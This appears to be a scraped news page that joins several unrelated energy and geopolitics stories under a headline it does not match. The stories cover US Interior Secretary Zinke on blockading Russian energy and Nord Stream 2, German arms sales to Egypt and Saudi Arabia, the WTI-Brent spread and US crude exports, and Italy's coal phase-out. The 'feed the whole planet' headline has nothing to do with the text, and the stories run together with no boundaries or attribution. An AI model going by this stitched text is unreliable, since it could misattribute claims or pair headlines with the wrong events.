Russia seeks to ‘feed the whole planet’ – PM
Zinke alleged that Russia’s engagement in Syria – notably, where it is operating at the invitation of the legitimate government – is a pretext to explore new energy markets.
“I believe the reason they are in the Middle East is they want to broker energy just like they do in eastern Europe, the southern belly of Europe,” he has reportedly said.
And, according to to the official, there are ways and means to tackle it.
“The United States has that ability, with our Navy, to make sure the sea lanes are open, and, if necessary, to blockade … to make sure that their energy does not go to market,” he said.
Zinke was addressing the attendees of the event hosted by the Consumer Energy Alliance, a non-profit group which styles itself as the “voice of the energy consumer” in the US. He went to compare Washington’s approaches to dealing with Russia and Iran, noting that they are effectively the same.
“The economic option on Iran and Russia is, more or less, leveraging and replacing fuels,” he said, while referring to Russia as a “one trick pony” with an economy dependent on fossil fuels.
The statements come as Trump administration has been on a mission to boost the export of its liquefied natural gas to Europe, replacing Russia, the far cheaper option for European consumers. For that effect, the Trump administration officials, including US President Donald Trump himself, try to persuade Germany to pull out of the “inappropriate” Nord Stream 2 pipeline project, which according to Trump, made Berlin Moscow’s “captive.”

Moscow has repeatedly stressed that the $ 11 billion Nord Stream 2 pipeline, which is set to double the existing pipeline capacity to 110 billion cubic meters, is a purely economic project. The Kremlin argues that Washington’s fervent opposition to the project is simply driven by economic reasons and is an example of unfair competition.
“I believe we share the view that energy cannot be a tool to exercise pressure and that consumers should be able to choose the suppliers,” Russian Energy Minister Aleksandr Novak said following a meeting with US Energy Secretary Rick Perry in Moscow in September.
The US stance has drawn backlash from Germany, which has reaffirmed its commitment to the project.
Germany’s leading organization for industry, the Federation of German Industries (BDI), has called on the US to stay away from the EU energy policy and the bilateral agreements between Berlin and Moscow.
“I have a big problem when a third state interferes in our energy supply,” Dieter Kempf, head of the Federation of German Industries (BDI) said following a recent meeting between German Chancellor Angela Merkel and Russian President Vladimir Putin.

While Egypt and Saudi Arabia are engaged in a long-running bombing campaign in war-torn Yemen, Riyadh and Cairo appear to be among the top clients of the German arms industry. The money spent is also on the rise.
The numbers have been disclosed in the Economy Ministry’s answer to an information request filed by Left Party MP Stefan Liebich. According to the data, Egypt has taken first place with some €300 million ($ 352.5 million), skyrocketing from €45 million in the same period last year. Riyadh is also showing quite an appetite for German arms, importing €148 million ($ 173.9 million) worth of military equipment, going up from €41 million.
The ministry also said that weapons exports to non-EU and non-NATO countries now constitute more than a half of the German total arms sales as they doubled, reaching €871 million ($ 1.023 billion), while similar exports to Germany’s NATO partners fell by a half over the same period.
The figures do not provide details on the exact types of weapons exported to each country. However, the German media assumed that, in case of Saudi Arabia, the exports might mostly involve the sale of four patrol boats and 110 military transport trucks, since these deals were already disclosed by the government in July.
The revelation provoked a wave of criticism from opposition politicians, who accused the government of fueling the war in Yemen. Liebich, who made the information request, called the “massively increased” exports to Saudi Arabia and Egypt “particularly reprehensible.”
Saudi Arabia and Egypt have “to answer for the thousands of deaths from their dirty war in Yemen,” he told Sueddeutsche Zeitung daily, adding that Germany should stop selling arms to Saudi Arabia and other countries involved in the Yemeni conflict.
“Earlier, there was a principle, under which… Germany never provided [arms] to the countries that were in a state of war. That is exactly the case here and that is why I am in favor of a full stop” of arms sales to the members of the Saudi-led coalition, the lawmaker said, as cited by the Deutschlandfunk broadcaster.
Liebich was supported by politicians from the Green Party, who also advocate a halt to the weapons exports to the Gulf countries. “We do not accept [the fact] that the German arms are exported to the Saudi Arabia and then [used] to kill [people] in Yemen,” Green Party co-chair Simone Peter wrote in a Twitter post. She added that a new law on arms exports is “long overdue.”
The Economy Ministry defended the government’s decision to approve the arms sales to Saudi Arabia and Egypt. It claimed that “what needs to be taken into account much more are the kinds of goods and their respective purpose,” insisting the government “pursues a restrictive and responsible arms export policy,” Deutsche Welle reported.
However, another Green Party politician, Agnieszka Brugger, told Sueddeutsche Zeitung that her party is pushing for a “binding act on the arms exports control to [ensure] that German rules on arms export that are strict on paper are finally observed in reality.”
Berlin is pursuing a somewhat ambiguous arms export policy in the case of Riyadh. On the one hand, it repeatedly demonstrated its reluctance to sell weapons to the Arab kingdom. For instance, in 2015, Germany avoided selling Heckler & Koch G36 assault rifles and Leopard 2 tanks to the Saudis. In January of the following year, then-German Vice Chancellor and Economy Minister Sigmar Gabriel also said that Berlin should “critically review” its arms sales to the kingdom.
On the other hand, Germany has never hesitated to sell what it calls “defensive” military gear to Saudi Arabia. Such sales included all-terrain armored vehicles, aerial refueling systems, combat jet parts, patrol boats and even drones.
According to the German media, Berlin sold Riyadh €530 million worth of military equipment in 2016 alone. In particular, Germany sold helicopters, jets and aircraft parts needed for mid-air refueling to Saudi Arabia at that time.
Riyadh, however, said in May 2017 that it “accepts the German unwillingness regarding the exports to Saudi Arabia” and “won’t be stubborn in relation to arms deals.” Saudi Arabia is waging a military campaign against Houthi rebels in Yemen since March 2015, with international human rights groups blaming Riyadh for the rising number of civilian deaths there.

All the oil headlines this week are rightly focused on prices spiking to the highest levels in more than two and a half years. But Brent moved up to nearly a $ 7-per-barrel premium over WTI, a spread that is also at a multiyear high. The wide differential could supercharge crude oil exports from the U.S., which have already recently broken all-time highs.
Before the U.S. lifted the crude oil export ban at the end of 2015, WTI often traded at a significant discount to Brent. Much of that had to do with surplus supply trapped within the continent, as well as a shortage of pipeline capacity in certain areas of the U.S., meaning that surging shale output resulted in localized gluts.
That spread just about disappeared over the course of 2015 and 2016, with the two benchmarks moving nearly in lock step. However, at the end of August 2017, Hurricane Harvey blew open the WTI-Brent spread once again, and the two benchmarks diverged.

The renewed discount for WTI was the symptom of the massive refinery outages along the U.S. Gulf Coast, which led to a buildup in crude stocks as fewer refineries purchased oil for processing. The pricing differences are not expected to last forever, but for the time being, the spread between the two top oil benchmarks has remained open, even as most of the Gulf Coast refineries are back at full capacity.
The result has been a surge in U.S. crude oil exports. Refiners from around the world – with China a particularly keen buyer – have scrambled to book shipments from the U.S. Gulf Coast. U.S. crude exports have spiked, jumping from around half a million barrels per day in 2016 and about 1 mb/d for much of 2017, to over 2 mb/d at the end of October, an all-time high.

The flood of crude from U.S. shores has drastically cut into the net import total. Although crude net imports fluctuate quite a bit from week to week, they have largely stayed within a range of 6.5-7.5 mb/d for years. But over the past few weeks that total has plunged, dipping to 5.4 mb/d in the last week of October.
It is unclear if this situation will last. But if the WTI-Brent spread were to open up wide enough, it would start to alter trade flows even within the United States.
Back when WTI traded as much as $ 10 or $ 20 per barrel less than Brent (prior to 2015), huge volumes of crude were put on the nation’s railways, making their way around the country to different refineries. That was because refineries along the U.S. East Coast typically imported oil from abroad, but suddenly found crude from North Dakota, for example, cheaper than from West Africa (the result of the wide WTI-Brent spread).

Even after accounting for the significantly higher transport cost, crude-by-rail became a competing option to imports. East Coast refineries went from sourcing virtually none of their crude purchases from domestic sources, to buying about half from U.S. producers in 2014-2015. In January 2014, East Coast refineries bought the same amount of oil from domestic source as they did from foreign ones, the first time that has occurred.
However, once the WTI-Brent spread disappeared (again, when the crude oil export ban was lifted), East Coast refineries could no longer justify buying crude from North Dakota. They went back to buying oil from abroad. As of July 2017, East Coast refineries bought just 101,000 bpd from domestic suppliers.

That begs the question: will the renewed discount for WTI relative to Brent spark a renaissance in crude-by-rail shipments? Will East Coast refineries eschew foreign oil and once again buy domestically? The EIA says probably not. “The recent price spread, which has averaged $ 6/b in September and October, has not grown large enough—and is not expected to last long enough,” the EIA wrote in a recent data release.
Moreover, East Coast refiners now have to compete with the rest of the world in purchasing U.S. crude. They may be technically closer to the drill site, but much of the oil will be flowing from Texas shale fields to the Gulf Coast. Once it hits the open sea, the East Coast doesn’t have much of an advantage over foreign buyers.
Moreover, East Coast refiners have to buy shipments that are compliant with the Jones Act (i.e., the oil must travel on American ships), which adds to their cost. In short, East Coast refiners will likely stick with importing oil from abroad – these days it is increasingly coming from Iraq, for example.
While rising shale supply won’t supplant oil imports for the East Coast, it will increasingly flow abroad as other countries by discounted American crude. The longevity of this situation depends entirely upon the WTI discount relative to Brent, which, for now, is sticking around.

On Tuesday, Italy’s economic development minister said the country will commit to phasing out coal in its energy mix, ending all use by 2025 according to Argus Media.
The country follows the UK, Canada, and France in its pledge to end coal use in the coming years. For some countries, the pledge is more meaningful than for others.
In the UK, coal provided around 30 percent of the country’s electricity in 2014, the year before the government pledged to end coal power generation by 2025. Early this year, the UK had its first 24 hours with no coal-fired generation since 1882. The news came along with data from 2016 that reported coal-generated electricity made up just nine percent of the country’s energy mix.
